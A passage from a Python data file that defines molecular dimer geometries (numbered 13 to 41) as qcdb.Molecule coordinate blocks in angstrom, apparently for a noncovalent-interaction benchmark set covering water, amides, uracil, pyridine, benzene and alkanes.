H -2.05473726 0.41508213 1.47850360
H -0.38502338 0.44880090 2.06061419
--
0 1
O 2.09326841 0.91731136 0.21209725
H 1.27575101 0.42103887 0.03894435
H 2.67516986 0.65881349 -0.50364884
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '13')] = qcdb.Molecule("""
0 1
C -0.84931672 -0.33949876 2.49171664
H 0.18434396 -0.01104732 2.41618542
H -0.88249791 -1.34205140 2.91270310
H -1.39080263 0.31687828 3.16842897
C -1.56403192 -0.35332311 1.15947545
O -2.74952638 -0.65153776 1.05676087
N -0.80165352 -0.02735461 0.08834167
H 0.16118756 0.24036035 0.21871364
C -1.38534986 -0.00235149 -1.23413683
H -1.89161720 -0.94280123 -1.44009631
H -2.11997230 0.79621180 -1.33087952
H -0.59464593 0.14957065 -1.96312772
--
0 1
O 2.13706570 0.25201737 0.45371880
H 2.85792051 0.87931700 0.54413361
C 2.65614986 -1.05334828 0.68760059
H 1.82357836 -1.74213597 0.58202402
H 3.42228862 -1.32234103 -0.03928018
H 3.06424691 -1.15479748 1.69323508
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '14')] = qcdb.Molecule("""
0 1
C -0.77857334 -0.46332064 2.49038768
H 0.22474462 -0.05095294 2.41348355
H -0.72247994 -1.48709180 2.85458464
H -1.35190757 0.11081693 3.21368365
C -1.52050259 -0.45662769 1.17232500
O -2.70083521 -0.78358573 1.08959682
N -0.79195361 -0.06964048 0.10058937
H 0.19411165 0.14570790 0.20292464
C -1.39779834 -0.05608245 -1.21131793
H -2.31492801 0.52889121 -1.19970991
H -0.69880422 0.38726130 -1.91536621
H -1.65298232 -1.06152895 -1.54543495
--
0 1
N 2.23828822 0.25457428 0.28251924
H 2.64195454 0.79449381 1.03771933
H 2.65629209 0.62195553 -0.56312668
C 2.61059106 -1.15660854 0.43627199
H 2.18430366 -1.72764112 -0.38510346
H 3.68598970 -1.34329798 0.46205539
H 2.17611849 -1.54101555 1.35610799
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '15')] = qcdb.Molecule("""
0 1
C -0.70150294 -0.29062770 2.40688440
H -1.18329596 0.39564777 3.09887422
H 0.34956157 -0.03032157 2.30783303
H -0.79405685 -1.29160545 2.82403929
C -1.44854625 -0.24487664 1.09181530
O -2.66045000 -0.42847909 1.03434577
N -0.67005656 0.00591656 0.00977691
H 0.32667532 0.12256396 0.14159284
C -1.22705457 0.08979374 -1.31996754
H -2.29202426 -0.10650119 -1.24087756
H -1.07780169 1.07994030 -1.74854354
H -0.77662849 -0.64799919 -1.98337273
--
0 1
C 2.04177491 -2.35169797 0.68639761
H 2.59999972 -3.26170120 0.48048961
H 1.11308306 -2.35822742 0.12207220
H 1.78255599 -2.32825127 1.74333861
C 2.80941086 -1.09728593 0.35016088
O 2.26422421 0.00415088 0.29318848
N 4.13616907 -1.26609970 0.13641291
H 4.51249037 -2.19334539 0.21317023
C 5.02340725 -0.15963372 -0.15253563
H 4.40921487 0.73117605 -0.23235934
H 5.75082180 -0.02016799 0.64486768
H 5.54839755 -0.31961545 -1.09167796
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '16')] = qcdb.Molecule("""
0 1
C -0.72430464 -0.70493582 2.28386786
H 0.33531828 -0.62994325 2.05318235
H -0.95169666 -1.71198961 2.62565146
H -0.96962784 -0.02207955 3.09376537
C -1.61493501 -0.38742925 1.10406897
O -2.83732387 -0.41502209 1.19413277
N -0.95342037 -0.07640442 -0.04081980
H 0.05380860 -0.07556651 -0.03664022
C -1.65812397 0.25009358 -1.25855306
H -2.72037197 0.17694444 -1.04665270
H -1.43030493 1.26296263 -1.58809384
H -1.40562611 -0.44433518 -2.05858358
--
0 1
O 2.10277707 -0.05840697 -0.15507669
H 2.66775436 -0.77136560 -0.46027609
H 2.68252869 0.70578659 -0.13117819
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '17')] = qcdb.Molecule("""
0 1
N -0.72999913 0.02276763 0.00091465
H 0.29842255 0.07400447 0.00162304
C -1.29682453 -1.24042682 0.00150234
O -0.59409886 -2.25351751 0.00263371
C -2.74362229 -1.26233170 0.00047938
H -3.24959045 -2.21183517 0.00083311
C -3.42201997 -0.09590921 -0.00092259
H -4.50089709 -0.04921603 -0.00174546
N -2.77483684 1.10540895 -0.00141807
H -3.28383807 1.97387739 -0.00248574
C -1.39147866 1.23701978 -0.00052538
O -0.83984371 2.31703528 -0.00100125
--
0 1
N 4.14382946 -1.08570382 0.00049928
H 4.59107325 -0.17913062 0.00088609
C 4.99987723 -2.20032161 -0.00100060
O 6.20932926 -2.04861719 -0.00174980
C 4.28565880 -3.46249515 -0.00150500
H 4.85224335 -4.37752590 -0.00264363
C 2.93548983 -3.46631302 -0.00054490
H 2.35852659 -4.37927779 -0.00086358
N 2.19749842 -2.31543218 0.00090551
H 1.17116216 -2.33687498 0.00158258
C 2.77026935 -1.07076714 0.00145616
O 2.11994847 -0.02954883 0.00269255
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '18')] = qcdb.Molecule("""
0 1
O -0.55283102 -0.10169749 -0.00049879
H -0.87175963 0.80179220 0.00014440
H 0.41265950 -0.00183225 -0.00025181
--
0 1
N 2.36402099 0.09662268 0.00014680
C 3.05992763 0.06265189 1.14489465
H 2.47525508 0.08626283 2.05576267
C 4.44895122 -0.00253054 1.19489071
H 4.95485760 -0.02738470 2.14921983
C 5.16011436 -0.03565634 -0.00002044
H 6.23995431 -0.08742989 -0.00010086
C 4.44880607 -0.00259720 -1.19482173
H 4.95460301 -0.02747022 -2.14922033
C 3.05977605 0.06259779 -1.14467547
H 2.47500717 0.08619845 -2.05546803
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '19')] = qcdb.Molecule("""
0 1
O -0.62765177 0.08746727 0.00147128
H 0.34360203 0.12230333 -0.00060045
C -0.97793123 -1.27855601 0.00123841
H -2.06339209 -1.34204332 0.00500898
H -0.61488369 -1.80637584 -0.88538395
H -0.60864033 -1.80823682 0.88417273
--
0 1
N 2.27233665 0.01643230 -0.00162684
C 2.96870504 -0.00800303 -1.14634644
H 2.38422645 0.01522051 -2.05732188
C 4.35834211 -0.05774589 -1.19503169
H 4.86569445 -0.07503793 -2.14881442
C 5.06871533 -0.08345851 0.00058133
H 6.14905134 -0.12122326 0.00143063
C 4.35646788 -0.05843740 1.19512119
H 4.86226662 -0.07626173 2.14960688
C 2.96691424 -0.00868772 1.14416710
H 2.38090845 0.01398671 2.05428579
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '20')] = qcdb.Molecule("""
0 1
C -1.06170920 1.29714057 0.29206000
O -0.35816112 2.27045861 0.53181267
O -0.58930352 0.09491776 0.00378881
H 0.40443566 0.12772262 0.01841184
C -2.55842780 1.34254982 0.29625732
H -2.89599798 2.34746400 0.51831634
H -2.93288928 1.02239045 -0.67299555
H -2.93721196 0.64491043 1.03955708
--
0 1
C 2.78934845 1.10841924 0.27118376
O 2.08573008 0.13510475 0.03139616
O 2.31692211 2.31085463 0.55896223
H 1.32313357 2.27795640 0.54456172
C 4.28606090 1.06251650 0.26921936
H 4.62364046 0.06119730 0.03169387
H 4.66755944 1.77286944 -0.46024953
H 4.65757721 1.36521101 1.24527472
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '21')] = qcdb.Molecule("""
0 1
C -1.30974974 1.18017617 -0.02517034
O -0.72530044 2.15514767 0.45271335
N -0.66562116 0.09505470 -0.49199449
H 0.35458266 0.05144817 -0.45930922
H -1.18362704 -0.67359969 -0.87075610
C -2.81671934 1.15599865 -0.11060597
H -3.22062895 1.26254146 0.89308239
H -3.20942754 0.24863402 -0.56190009
H -3.14315813 2.01659563 -0.68889311
--
0 1
C 2.77960183 1.06388568 0.13435724
O 2.19518007 0.08986525 -0.34537373
N 2.13551426 2.14862891 0.60220379
H 1.11540890 2.19306669 0.56790248
H 2.65353833 2.91659011 0.98232444
C 4.28660101 1.08817006 0.21958232
H 4.67847207 1.98781958 0.68676633
H 4.69015720 1.00062503 -0.78619798
H 4.61437977 0.21759516 0.78176266
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '22')] = qcdb.Molecule("""
0 1
C -1.11362611 1.32702009 0.27516705
O -0.46708264 2.34938778 0.46153746
O -0.57808939 0.13692049 0.04961747
H 0.41332036 0.20325661 0.05548711
C -2.61142469 1.28618957 0.27736131
H -3.00664872 2.27688545 0.46578983
H -2.96425623 0.91525868 -0.68200123
H -2.95311421 0.59179821 1.04124041
--
0 1
N 4.18869738 1.08795338 0.18288157
H 4.58190249 0.17256315 0.01116215
C 5.11022529 2.13606900 0.36433468
O 6.30737167 1.91777319 0.31145472
C 4.47115922 3.41553138 0.60494183
H 5.09069398 4.28245626 0.75641911
C 3.12407502 3.49552153 0.63432307
H 2.60123483 4.42396853 0.80962128
N 2.32034427 2.40483955 0.44391704
H 1.29629244 2.47478724 0.46770730
C 2.82027675 1.15461676 0.20974482
O 2.10824430 0.16511187 0.03627464
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '23')] = qcdb.Molecule("""
0 1
C -1.23272700 1.21163896 -0.14162406
O -0.57127667 2.24201573 0.02561679
N -0.67058051 0.00388878 -0.31428147
H 0.34384695 -0.09056011 -0.30832667
H -1.24421373 -0.80632370 -0.44668271
C -2.73824495 1.26675766 -0.15588657
H -3.07797534 1.64660511 0.80450159
H -3.20211503 0.30286549 -0.34621112
H -3.04998747 1.97549049 -0.91859737
--
0 1
N 4.19521289 1.11742864 -0.11954193
H 4.68524234 0.24147146 -0.23748040
C 4.99883890 2.26027358 0.03093977
O 6.21440093 2.16465126 0.01575499
C 4.22624673 3.47559007 0.19408371
H 4.74800972 4.40878293 0.31711883
C 2.87708602 3.41391454 0.18840695
H 2.25668197 4.29027492 0.30608385
N 2.19200391 2.24163303 0.03384119
H 1.15921343 2.23257196 0.03300387
C 2.82289388 1.03716353 -0.12841885
O 2.22570515 -0.02675243 -0.27022634
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '24')] = qcdb.Molecule("""
0 1
C 0.71264532 1.12099570 0.06054078
H 1.35784165 1.98639917 0.12773717
C 1.25823573 -0.15925190 0.12423352
H 2.32495428 -0.28709988 0.24674303
C 0.42688496 -1.27452666 0.04265043
H 0.85044465 -2.26843268 0.09474995
C -0.94957784 -1.11007406 -0.10031360
H -1.59445570 -1.97627370 -0.16371348
C -1.49552564 0.17105056 -0.16154602
H -2.56378279 0.29922115 -0.27370311
C -0.66382760 1.28664289 -0.08340143
H -1.08690070 2.28100020 -0.13288613
--
0 1
C 1.98776046 1.10975720 3.71031958
H 2.63260558 1.97594094 3.77407030
C 2.53371358 -0.17139390 3.77183931
H 3.60192047 -0.29954095 3.88458353
C 1.70206410 -1.28699400 3.69318889
H 2.12514581 -2.28134643 3.74284255
C 0.32566254 -1.12135897 3.54847214
H -0.31944006 -1.98676921 3.48083951
C -0.21989733 0.15887378 3.48450631
H -1.28652536 0.28670299 3.36132755
C 0.61137962 1.27415454 3.56657725
H 0.18785474 2.26805957 3.51420832
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '25')] = qcdb.Molecule("""
0 1
N 1.57248145 0.25454916 -0.25648131
C 0.96935990 -0.90316032 0.04452614
H 1.61363891 -1.77218120 0.10234520
C -0.39815811 -1.02881911 0.28096043
H -0.81842477 -1.99173710 0.53356364
C -1.19580525 0.10655779 0.19539732
H -2.26068964 0.04953865 0.37344280
C -0.58712829 1.31741239 -0.12010544
H -1.16181223 2.22950003 -0.20046257
C 0.78854733 1.33970567 -0.33224053
H 1.28843202 2.26879436 -0.57852690
--
0 1
N -0.53372327 -1.51586163 3.84414371
C -1.46620136 -0.55523217 3.91799487
H -2.46899061 -0.88618697 4.16018773
C -1.20419832 0.79583625 3.70861549
H -2.00275608 1.52034169 3.78688658
C 0.09522901 1.18507754 3.39834708
H 0.33721357 2.22407602 3.22247582
C 1.07478832 0.20217938 3.31498561
H 2.09708956 0.44892512 3.06654863
C 0.71230860 -1.12295838 3.54817861
H 1.45616936 -1.90851301 3.49173001
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '26')] = qcdb.Molecule("""
0 1
N 1.37690111 0.83974747 0.73462494
H 1.05181240 1.38622385 1.52335563
C 1.30898271 1.45752981 -0.52065500
O 0.92056136 2.61107777 -0.62597673
N 2.01142293 -1.21320830 -0.09807182
H 1.72728551 0.99084268 -2.61199556
C 2.02573687 -0.69717123 -1.36439740
H 2.29751698 -1.39106004 -2.14564531
C 1.71451235 0.59193780 -1.61248722
H 2.12945422 -2.20152091 0.05682913
C 1.64594503 -0.48520598 1.01871830
O 1.56111602 -0.97181638 2.12980905
--
0 1
N -1.35546089 -0.83604594 0.73462494
H -1.03037218 -1.38252232 1.52335563
C -1.28754249 -1.45382828 -0.52065500
O -0.89912114 -2.60737623 -0.62597673
N -1.98998271 1.21690983 -0.09807182
H -1.70584529 -0.98714115 -2.61199556
C -2.00429665 0.70087276 -1.36439740
H -2.27607676 1.39476157 -2.14564531
C -1.69307213 -0.58823627 -1.61248722
H -2.10801399 2.20522244 0.05682913
C -1.62450481 0.48890751 1.01871830
O -1.53967580 0.97551791 2.12980905
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '27')] = qcdb.Molecule("""
0 1
C 0.81874699 0.86417234 0.18828612
H 1.46611361 1.71666767 0.34472141
C 1.36899712 -0.39052394 -0.06669818
H 2.44303637 -0.51186194 -0.11057444
C 0.53437860 -1.48849320 -0.27188804
H 0.96084825 -2.46156422 -0.47550749
C -0.84911561 -1.33050735 -0.21989643
H -1.49706942 -2.18186028 -0.37955321
C -1.39948546 -0.07603020 0.04043417
H -2.47268667 0.04490778 0.09338206
C -0.56529230 1.02140336 0.24227921
H -0.99255667 1.99366131 0.44625817
--
0 1
N -2.39843199 0.16214088 3.52041137
C -1.78354606 1.31980869 3.80047556
H -2.43115011 2.17298014 3.96298765
C -0.40133116 1.46065642 3.89064637
H 0.03051760 2.42430654 4.12186267
C 0.39962023 0.34367712 3.67643246
H 1.47718940 0.41406140 3.73126697
C -0.22093167 -0.86497792 3.38277288
H 0.35484284 -1.76059980 3.19869795
C -1.61144595 -0.90301580 3.31732347
H -2.12029887 -1.83146918 3.08848079
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '28')] = qcdb.Molecule("""
0 1
C 0.82576911 1.23652484 -0.04025044
H 1.52101317 2.06312520 -0.08247145
C 1.30015992 -0.06294088 0.12725601
H 2.36365753 -0.24226113 0.20767420
C 0.40352312 -1.12855218 0.19824486
H 0.77375338 -2.13742677 0.32412109
C -0.96780949 -0.89519049 0.10313994
H -1.66520900 -1.71998342 0.16042745
C -1.44350838 0.40448328 -0.06244130
H -2.50751124 0.58550112 -0.12415016
C -0.54575549 1.46876875 -0.13624741
H -0.91422190 2.47742220 -0.26785516
--
0 1
N -0.27488064 0.67158742 3.21864568
H -0.64818803 1.57334885 2.95575271
C 1.11726604 0.59860052 3.35065902
O 1.80817636 1.59302421 3.20582496
C 1.59616616 -0.73547719 3.66876922
H 2.65321825 -0.88769313 3.80289036
C 0.71645693 -1.74985837 3.79498575
H 1.02238445 -2.75827898 4.03151011
N -0.62878896 -1.56482645 3.62489361
H -1.27753679 -2.32738539 3.72376278
C -1.20323727 -0.34002542 3.32547899
O -2.40102568 -0.18920215 3.18336680
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '29')] = qcdb.Molecule("""
0 1
N 1.21075533 0.02867578 0.32971111
C 0.61193497 -1.15844901 0.15345176
H 1.25147791 -2.02952340 0.21929295
C -0.75131399 -1.30864956 -0.08883407
H -1.17041577 -2.29686932 -0.21338320
C -1.54786767 -0.16994027 -0.15646691
H -2.61101275 -0.24595469 -0.33875574
C -0.94362237 1.07063612 0.01982310
H -1.51881431 1.98450028 -0.01164403
C 0.42771857 1.11610863 0.25734879
H 0.92469451 2.06805173 0.39754798
--
0 1
N -0.71316758 -0.28394932 3.29752332
H -1.60805660 -0.71581281 3.11291983
C -0.71291270 1.11386048 3.39053432
O -1.75279577 1.74206028 3.27568419
C 0.60658206 1.67294182 3.61809739
H 0.70789842 2.74016399 3.71396557
C 1.67645565 0.85424952 3.68961744
H 2.68033469 1.22291422 3.83804398
N 1.55839451 -0.50304375 3.57706278
H 2.37183050 -1.09523110 3.56889514
C 0.35794757 -1.15027617 3.35068108
O 0.26581032 -2.35569425 3.21710180
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '30')] = qcdb.Molecule("""
0 1
C 0.83551718 1.11516693 0.02140131
H 1.48432398 1.98060858 0.01953430
C 1.38327497 -0.16614721 0.02376531
H 2.45714902 -0.29520468 0.02277108
C 0.54755466 -1.28131632 0.02168563
H 0.97293610 -2.27580453 0.01977853
C -0.83552313 -1.11516159 0.02139907
H -1.48433419 -1.98060640 0.01953009
C -1.38328358 0.16615413 0.02375775
H -2.45715618 0.29520906 0.02275707
C -0.54756577 1.28132347 0.02168025
H -0.97294284 2.27580548 0.01976873
--
0 1
C 0.65578060 -0.11679048 3.53075174
H 1.04724138 -1.12390931 3.52628348
H 1.37085438 0.69327350 3.52625015
C -0.65577592 0.11679215 3.53076063
H -1.37084787 -0.69327237 3.52626454
H -1.04723903 1.12391105 3.52630243
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '31')] = qcdb.Molecule("""
0 1
N -0.05087365 -0.98008127 0.03396219
H -0.05322205 -1.99069374 0.04982167
C -1.30881316 -0.36187638 0.00402596
O -2.32722000 -1.03255492 -0.00582886
C -1.23681849 1.08804829 -0.01222440
H -2.15273897 1.65146044 -0.05477443
C -0.03519433 1.69783584 0.03370483
H 0.07036636 2.77247575 0.03188224
N 1.13452913 0.99028251 0.09184461
H 2.02372032 1.45677218 0.15569277
C 1.19318599 -0.39183287 0.11577512
O 2.23639797 -1.01118826 0.19418562
--
0 1
C 0.72600726 0.02505349 3.39819044
H 1.24312499 -0.84593440 3.02096384
H 1.33161826 0.81204754 3.82550477
C -0.60276924 0.12564394 3.34894351
H -1.21477213 -0.66183565 2.93204279
H -1.11459423 0.99671353 3.73294327
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '32')] = qcdb.Molecule("""
0 1
N -0.05545357 -0.94799090 0.01001028
H -0.05731609 -1.95771330 0.05505287
C -1.31395971 -0.33514498 -0.06458622
O -2.32889664 -1.00790087 -0.12310273
C -1.24835877 1.11605191 -0.06650860
H -2.16434937 1.67533298 -0.14710244
C -0.05308010 1.73142748 0.03419541
H 0.04811054 2.80642986 0.04341968
N 1.11592628 1.02759107 0.13516893
H 1.99665515 1.49727976 0.26162029
C 1.17534700 -0.35380470 0.17616616
O 2.21463146 -0.96646542 0.33517250
--
0 1
C 0.70785184 -0.17230221 3.27635136
H 1.70367011 -0.52628807 3.16213263
C -0.43675225 0.21415547 3.38254320
H -1.44163480 0.54285582 3.48290737
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '33')] = qcdb.Molecule("""
0 1
N 1.38138219 -0.00023348 0.13146374
C 0.67935079 -1.14023946 0.09207966
H 1.25871960 -2.05496223 0.12588361
C -0.70972232 -1.19311407 0.00666426
H -1.21408768 -2.14856163 -0.02530851
C -1.42161357 0.00013343 -0.04081690
H -2.50069615 0.00025757 -0.10916973
C -0.70940120 1.19317538 0.00652198
H -1.21351163 2.14874784 -0.02552831
C 0.67965167 1.13995623 0.09189303
H 1.25926073 2.05451090 0.12550248
--
0 1
C 0.01960458 0.66643934 3.48727228
H 0.93007858 1.22592506 3.32815744
H -0.88994292 1.22884357 3.64423278
C 0.01993726 -0.66624796 3.48740452
H 0.93067296 -1.22533044 3.32839408
H -0.88935083 -1.22907273 3.64449367
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '34')] = qcdb.Molecule("""
0 1
C -2.53330865 -0.29487907 0.71314876
H -2.56362682 -0.97708181 -0.13642264
H -2.56697835 -0.89587590 1.62173177
H -3.43442611 0.31595713 0.68410447
C -1.27188487 0.55765547 0.67435468
H -1.27102630 1.25656571 1.51431940
H -1.26663255 1.16789581 -0.23182653
C -0.00013504 -0.27841822 0.71960315
H -0.00015938 -0.88722952 1.62863709
H -0.00036543 -0.98071418 -0.11940439
C 1.27189476 0.55738219 0.67406108
H 1.27097175 1.25663331 1.51370541
H 1.26663649 1.16718250 -0.23238692
C 2.53340376 -0.29494176 0.71328015
H 2.56391919 -0.97777410 -0.13577836
H 3.43430956 0.31625432 0.68359945
H 2.56755821 -0.89520887 1.62232865
--
0 1
C 2.53355730 0.29502133 4.51309986
H 2.56814179 0.89482803 3.60377431
H 2.56406061 0.97822791 5.36184468
H 3.43423799 -0.31647598 4.54330880
C 1.27173110 -0.55686594 4.55240411
H 1.26628739 -1.16659365 5.45890107
H 1.27060059 -1.25621968 3.71282305
C -0.00004389 0.27923316 4.50678767
H -0.00019882 0.98154314 5.34577214
H 0.00003301 0.88800958 3.59771803
C -1.27180473 -0.55690882 4.55205921
H -1.26642249 -1.16701827 5.45830931
H -1.27069839 -1.25593171 3.71219555
C -2.53352396 0.29513749 4.51308150
H -2.56771726 0.89567116 3.60420474
H -3.43432593 -0.31616087 4.54259468
H -2.56406349 0.97772373 5.36234289
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '35')] = qcdb.Molecule("""
0 1
C -2.53038287 -0.41757533 0.68130643
H -2.55988603 -0.98278998 -0.25015619
H -2.55403625 -1.13386495 1.50265790
H -3.43621355 0.18414376 0.73677133
C -1.27615683 0.44363493 0.75002483
H -1.27808384 1.02521785 1.67508548
H -1.28033899 1.16855564 -0.06715806
C 0.00220470 -0.38071620 0.67899257
H 0.00782894 -1.11141304 1.49383122
H 0.00624866 -0.96052270 -0.24882046
C 1.26833347 0.46239635 0.74936913
H 1.26201986 1.04425029 1.67424645
H 1.26163488 1.18705711 -0.06803458
C 2.53496627 -0.38042469 0.68068636
H 2.57244024 -0.94571652 -0.25045186
H 3.43198117 0.23441492 0.73557772
H 2.56920771 -1.09581003 1.50245608
--
0 1
C -0.00052120 0.06397129 5.24130633
C 0.00055054 -0.07615981 6.76103928
H -0.88648549 0.38791623 7.19440870
H 0.00980204 -1.12694006 7.05404915
H 0.87921076 0.40350475 7.19468235
C -1.23997654 -0.61768074 4.66740782
H -1.26327576 -0.52872361 3.58057863
H -1.25206217 -1.67895713 4.92042102
H -2.15092026 -0.16538948 5.06249294
C 1.25208391 -0.59356951 4.66783599
H 1.27341069 -0.50528385 3.58086503
H 1.28521444 -1.65413035 4.92192831
H 2.15389614 -0.12292620 5.06225711
C -0.01476908 1.54376378 4.86668505
H 0.86299692 2.05435080 5.26564018
H -0.01529328 1.67021871 3.78303336
H -0.90287503 2.03709750 5.26447319
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '36')] = qcdb.Molecule("""
0 1
C 0.38252221 -0.07060697 0.76689582
C -1.04063947 0.39681125 1.06093593
H -1.77157460 -0.28150025 0.61833023
H -1.22471777 0.43573509 2.13551890
H -1.21406603 1.39372444 0.65309065
C 0.59084747 -1.46681814 1.34797791
H 1.60291380 -1.82295000 1.15010285
H 0.43896858 -1.46674598 2.42828668
H -0.10991906 -2.17868425 0.90931390
C 1.37826905 0.89843536 1.39914944
H 2.40439397 0.58544074 1.20073365
H 1.24378092 0.94597430 2.48070991
H 1.24837318 1.90502262 0.99895071
C 0.60196094 -0.11103419 -0.74309659
H 0.45921182 0.87703910 -1.18289819
H 1.61369399 -0.44345945 -0.97967210
H -0.09953078 -0.79754982 -1.21922069
--
0 1
C -0.37502842 0.06931363 5.96648833
C 1.04778403 -0.39965237 5.67308879
H 1.23222323 -0.43898152 4.59856833
H 1.77921818 0.27802046 6.11582437
H 1.22004770 -1.39665841 6.08120936
C -0.58142523 1.46587516 5.38565786
H -1.59338833 1.82286061 5.58250538
H 0.11949337 2.17694663 5.82537963
H -0.42831602 1.46607177 4.30551550
C -0.59532291 0.10948985 7.47634196
H -1.60653907 0.44376683 7.71241515
H 0.10718954 0.79443888 7.95318018
H -0.45475982 -0.87903049 7.91579370
C -1.37149114 -0.89846403 5.33334194
H -1.24256513 -1.90543941 5.73292091
H -2.39738024 -0.58469117 5.53172979
H -1.23678678 -0.94543842 4.25176527
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '37')] = qcdb.Molecule("""
0 1
C 0.79991408 -1.02205164 0.68773696
H 0.85355588 -1.12205101 -0.39801435
H 1.49140210 -1.74416936 1.11972040
C 1.11688700 0.42495279 1.09966205
H 1.83814230 0.89014504 0.43045256
H 1.55556959 0.43982464 2.09708356
C -0.24455916 1.16568959 1.10297714
H -0.25807760 2.00086313 0.40532333
H -0.44880450 1.57699582 2.09098447
C -1.29871418 0.10381191 0.73930899
H -1.47356078 0.10524338 -0.33800545
H -2.25673428 0.27804118 1.22715843
C -0.64687993 -1.22006836 1.13630660
H -1.12443918 -2.08762702 0.68299327
H -0.68601864 -1.34528332 2.22022006
--
0 1
C 0.04984615 0.09420760 5.61627735
C -0.04649805 -0.05787837 7.13191782
H 0.94604832 -0.07334458 7.58427505
H -0.60542282 0.77000613 7.57035274
H -0.55366275 -0.98654445 7.39726741
C 0.76389939 1.40111272 5.28065247
H 0.84541894 1.53461185 4.20097059
H 0.22042700 2.25580115 5.68615385
H 1.77150393 1.41176313 5.69888547
C -1.35516567 0.11403225 5.01895782
H -1.31823408 0.23122219 3.93510886
H -1.93746520 0.94145581 5.42730374
H -1.88506873 -0.81375459 5.24028712
C 0.83774596 -1.07927730 5.03893917
H 0.34252564 -2.02626804 5.25918232
H 0.93258913 -0.99209454 3.95580439
H 1.84246405 -1.11668194 5.46268763
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '38')] = qcdb.Molecule("""
0 1
C 0.95688019 -0.89184563 1.14195000
H 1.50456597 -1.27835762 0.28342019
H 1.42138447 -1.31477793 2.03102546
C 0.99094943 0.65850830 1.14550384
H 1.51059446 1.02309646 0.25994788
H 1.51625823 1.05981813 2.01053703
C -0.47945194 1.10231879 1.10387910
H -0.61626861 2.06487722 0.61356737
H -0.87474223 1.18907144 2.11806960
C -1.18210650 -0.05279656 0.39334575
H -0.94888216 -0.02683030 -0.67380459
H -2.26566452 -0.03356474 0.50127403
C -0.53065958 -1.27488954 1.03930959
H -0.69039061 -2.19702093 0.48299221
H -0.95084939 -1.41541197 2.03674782
--
0 1
C -1.13198517 -0.38391856 5.05596626
H -1.46511966 -0.14721994 4.04338190
H -1.93677357 -0.92701702 5.54895277
C 0.18162128 -1.17946347 5.00820507
H 0.23156623 -1.83720616 4.14207124
H 0.26190891 -1.81082110 5.89259036
C 1.31093651 -0.11675764 5.00880116
H 1.93220146 -0.17743649 4.11692754
H 1.96834600 -0.26664069 5.86420633
C 0.60076314 1.24491110 5.11666799
H 0.42089996 1.65340289 4.12066887
H 1.18114710 1.97931461 5.67264126
C -0.74128932 0.91043867 5.76647985
H -1.48095789 1.70295043 5.66159855
H -0.60124939 0.71879862 6.83302881
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '39')] = qcdb.Molecule("""
0 1
C 0.76554546 0.86824433 0.82099095
H 1.43747647 1.68000664 1.06510281
C 1.23765260 -0.44283807 0.79388795
H 2.27575877 -0.64853808 1.01771141
C 0.37223723 -1.48853667 0.47726862
H 0.73818789 -2.50608012 0.45705609
C -0.96493318 -1.22297162 0.18687834
H -1.63645949 -2.03456079 -0.05777362
C -1.43706509 0.08840558 0.21327714
H -2.47468432 0.29430216 -0.01146746
C -0.57190649 1.13402416 0.53081281
H -0.93769935 2.15171058 0.55107764
--
0 1
C -0.76345318 -0.72677383 4.05982770
H -0.86970702 -0.55182467 2.98752083
H -1.41509075 -1.55603772 4.33297836
C 0.70608801 -0.98383692 4.40395757
H 1.20131879 -1.62142197 3.67337330
H 0.76936719 -1.48405069 5.37142421
C 1.34622506 0.42155976 4.49491043
H 1.99649337 0.61423069 3.64305751
H 1.95909224 0.51072918 5.39063579
C 0.16717893 1.42073677 4.52178247
H 0.05002744 1.87970717 3.53949713
H 0.31277252 2.22224160 5.24418107
C -1.06659283 0.56364158 4.81743133
H -1.99758134 1.03937903 4.51151819
H -1.13201859 0.35432067 5.88796657
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '40')] = qcdb.Molecule("""
0 1
C 0.31195353 0.56102334 0.49669886
H 0.74213608 1.55336911 0.48156571
C 1.14218235 -0.55807461 0.53606185
H 2.21651131 -0.43425014 0.55235015
C 0.58780415 -1.83668705 0.55414435
H 1.23191239 -2.70484153 0.58522179
C -0.79665772 -1.99637562 0.53296300
H -1.22677442 -2.98844427 0.54863708
C -1.62689297 -0.87747365 0.49416828
H -2.70112211 -1.00134997 0.47981498
C -1.07266525 0.40120590 0.47597397
H -1.71697357 1.26940117 0.44591995
--
0 1
C 0.17046797 0.50613197 4.83469402
C 1.61671665 0.68491933 4.37973254
H 2.03257337 1.61819721 4.76315552
H 2.24011597 -0.13569629 4.73858640
H 1.67732578 0.70431062 3.29079832
C 0.11607660 0.47476083 6.35955934
H -0.90971343 0.34734041 6.70864711
H 0.71148250 -0.35092603 6.75211308
H 0.50437108 1.40264546 6.78246492
C -0.37891207 -0.80336000 4.27439800
H -1.41378567 -0.95363504 4.58706959
H 0.20754451 -1.65233376 4.63020927
H -0.35013224 -0.80381278 3.18408376
C -0.67090481 1.67070366 4.31848855
H -0.64936386 1.70673405 3.22848999
H -1.71069396 1.56693409 4.63297103
H -0.29525222 2.62139813 4.70059546
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '41')] = qcdb.Molecule("""
0 1
N -0.20890478 -0.96458262 0.53476104
H -0.22415099 -1.97310940 0.60508386
C -1.44634208 -0.34458112 0.30665858
O -2.46123675 -1.01079161 0.19789196
